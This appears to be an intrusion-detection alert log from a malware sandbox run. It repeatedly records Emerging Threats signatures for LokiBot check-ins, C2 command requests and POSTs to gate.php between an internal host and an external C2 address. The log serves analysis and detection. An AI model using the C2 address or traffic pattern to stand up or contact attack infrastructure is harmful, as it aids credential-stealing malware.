                                    12/03/20-10:03:59.658099TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.658099TCP2025381ET TROJAN LokiBot Checkin4996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.658099TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.658099TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.717549TCP2025483ET TROJAN LokiBot Fake 404 Response804996347.91.79.163192.168.2.3
                                    12/03/20-10:03:59.937167TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2025381ET TROJAN LokiBot Checkin4996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.996311TCP2025483ET TROJAN LokiBot Fake 404 Response804996447.91.79.163192.168.2.3
                                    12/03/20-10:04:00.213594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2025381ET TROJAN LokiBot Checkin4996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.271773TCP2025483ET TROJAN LokiBot Fake 404 Response804996547.91.79.163192.168.2.3
                                    12/03/20-10:04:00.506450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2025381ET TROJAN LokiBot Checkin4996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.568294TCP2025483ET TROJAN LokiBot Fake 404 Response804996647.91.79.163192.168.2.3
                                    12/03/20-10:04:00.791546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2025381ET TROJAN LokiBot Checkin4996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.944044TCP2025483ET TROJAN LokiBot Fake 404 Response804996747.91.79.163192.168.2.3
                                    12/03/20-10:04:01.165537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2025381ET TROJAN LokiBot Checkin4996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.224258TCP2025483ET TROJAN LokiBot Fake 404 Response804996847.91.79.163192.168.2.3
                                    12/03/20-10:04:01.475567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2025381ET TROJAN LokiBot Checkin4996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.535551TCP2025483ET TROJAN LokiBot Fake 404 Response804996947.91.79.163192.168.2.3
                                    12/03/20-10:04:01.768613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2025381ET TROJAN LokiBot Checkin4997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.828971TCP2025483ET TROJAN LokiBot Fake 404 Response804997047.91.79.163192.168.2.3
                                    12/03/20-10:04:02.064175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.064175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.064175TCP2025381ET TROJAN LokiBot Checkin4997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.064175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.064175TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.206246TCP2025483ET TROJAN LokiBot Fake 404 Response804997147.91.79.163192.168.2.3
                                    12/03/20-10:04:02.431475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2025381ET TROJAN LokiBot Checkin4997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.490119TCP2025483ET TROJAN LokiBot Fake 404 Response804997247.91.79.163192.168.2.3
                                    12/03/20-10:04:02.710187TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2025381ET TROJAN LokiBot Checkin4997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.770838TCP2025483ET TROJAN LokiBot Fake 404 Response804997347.91.79.163192.168.2.3
                                    12/03/20-10:04:02.991389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2025381ET TROJAN LokiBot Checkin4997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997480192.168.2.347.91.79.163
                                    12/03/20-10:04:03.052234TCP2025483ET TROJAN LokiBot Fake 404 Response804997447.91.79.163192.168.2.3
                                    12/03/20-10:04:03.285552TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2025381ET TROJAN LokiBot Checkin4997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.344530TCP2025483ET TROJAN LokiBot Fake 404 Response804997547.91.79.163192.168.2.3
                                    12/03/20-10:04:03.554473TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2025381ET TROJAN LokiBot Checkin4997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.614421TCP2025483ET TROJAN LokiBot Fake 404 Response804997647.91.79.163192.168.2.3
                                    12/03/20-10:04:03.844236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2025381ET TROJAN LokiBot Checkin4997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.907417TCP2025483ET TROJAN LokiBot Fake 404 Response804997747.91.79.163192.168.2.3
                                    12/03/20-10:04:04.123665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2025381ET TROJAN LokiBot Checkin4997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.184755TCP2025483ET TROJAN LokiBot Fake 404 Response804997847.91.79.163192.168.2.3
                                    12/03/20-10:04:04.413716TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2025381ET TROJAN LokiBot Checkin4997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.476197TCP2025483ET TROJAN LokiBot Fake 404 Response804997947.91.79.163192.168.2.3
                                    12/03/20-10:04:04.697742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2025381ET TROJAN LokiBot Checkin4998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.758396TCP2025483ET TROJAN LokiBot Fake 404 Response804998047.91.79.163192.168.2.3
                                    12/03/20-10:04:04.963596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2025381ET TROJAN LokiBot Checkin4998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998180192.168.2.347.91.79.163
                                    12/03/20-10:04:05.025184TCP2025483ET TROJAN LokiBot Fake 404 Response804998147.91.79.163192.168.2.3
                                    12/03/20-10:04:05.247696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2025381ET TROJAN LokiBot Checkin4998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.306277TCP2025483ET TROJAN LokiBot Fake 404 Response804998247.91.79.163192.168.2.3
                                    12/03/20-10:04:05.532498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2025381ET TROJAN LokiBot Checkin4998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.593428TCP2025483ET TROJAN LokiBot Fake 404 Response804998347.91.79.163192.168.2.3
                                    12/03/20-10:04:05.820293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2025381ET TROJAN LokiBot Checkin4998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.895039TCP2025483ET TROJAN LokiBot Fake 404 Response804998447.91.79.163192.168.2.3
                                    12/03/20-10:04:06.123173TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2025381ET TROJAN LokiBot Checkin4998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.183388TCP2025483ET TROJAN LokiBot Fake 404 Response804998547.91.79.163192.168.2.3
                                    12/03/20-10:04:06.401192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2025381ET TROJAN LokiBot Checkin4998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.462903TCP2025483ET TROJAN LokiBot Fake 404 Response804998647.91.79.163192.168.2.3
                                    12/03/20-10:04:06.688485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2025381ET TROJAN LokiBot Checkin4998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.751387TCP2025483ET TROJAN LokiBot Fake 404 Response804998747.91.79.163192.168.2.3
                                    12/03/20-10:04:07.003231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2025381ET TROJAN LokiBot Checkin4998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.064446TCP2025483ET TROJAN LokiBot Fake 404 Response804998847.91.79.163192.168.2.3
                                    12/03/20-10:04:07.279062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2025381ET TROJAN LokiBot Checkin4998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.338927TCP2025483ET TROJAN LokiBot Fake 404 Response804998947.91.79.163192.168.2.3
                                    12/03/20-10:04:07.573982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2025381ET TROJAN LokiBot Checkin4999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.634060TCP2025483ET TROJAN LokiBot Fake 404 Response804999047.91.79.163192.168.2.3
                                    12/03/20-10:04:07.858334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2025381ET TROJAN LokiBot Checkin4999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999180192.168.2.347.91.79.163
                                    12/03/20-10:04:08.050303TCP2025483ET TROJAN LokiBot Fake 404 Response804999147.91.79.163192.168.2.3
                                    12/03/20-10:04:08.266673TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2025381ET TROJAN LokiBot Checkin4999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.326612TCP2025483ET TROJAN LokiBot Fake 404 Response804999247.91.79.163192.168.2.3
                                    12/03/20-10:04:08.547826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2025381ET TROJAN LokiBot Checkin4999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.606347TCP2025483ET TROJAN LokiBot Fake 404 Response804999347.91.79.163192.168.2.3
                                    12/03/20-10:04:08.827518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2025381ET TROJAN LokiBot Checkin4999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.888387TCP2025483ET TROJAN LokiBot Fake 404 Response804999547.91.79.163192.168.2.3
                                    12/03/20-10:04:09.106498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2025381ET TROJAN LokiBot Checkin4999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.171284TCP2025483ET TROJAN LokiBot Fake 404 Response804999647.91.79.163192.168.2.3
                                    12/03/20-10:04:09.374098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2025381ET TROJAN LokiBot Checkin4999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.432904TCP2025483ET TROJAN LokiBot Fake 404 Response804999747.91.79.163192.168.2.3
                                    12/03/20-10:04:09.662563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2025381ET TROJAN LokiBot Checkin4999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.725847TCP2025483ET TROJAN LokiBot Fake 404 Response804999947.91.79.163192.168.2.3
                                    12/03/20-10:04:09.951988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2025381ET TROJAN LokiBot Checkin5000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000080192.168.2.347.91.79.163
                                    12/03/20-10:04:10.009026TCP2025483ET TROJAN LokiBot Fake 404 Response805000047.91.79.163192.168.2.3
                                    12/03/20-10:04:10.243520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2025381ET TROJAN LokiBot Checkin5000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.302791TCP2025483ET TROJAN LokiBot Fake 404 Response805000147.91.79.163192.168.2.3
                                    12/03/20-10:04:10.507912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2025381ET TROJAN LokiBot Checkin5000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.569188TCP2025483ET TROJAN LokiBot Fake 404 Response805000247.91.79.163192.168.2.3
                                    12/03/20-10:04:10.788542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2025381ET TROJAN LokiBot Checkin5000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.861552TCP2025483ET TROJAN LokiBot Fake 404 Response805000347.91.79.163192.168.2.3
                                    12/03/20-10:04:11.075915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.075915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.075915TCP2025381ET TROJAN LokiBot Checkin5000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.075915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.2.347.91.79.163
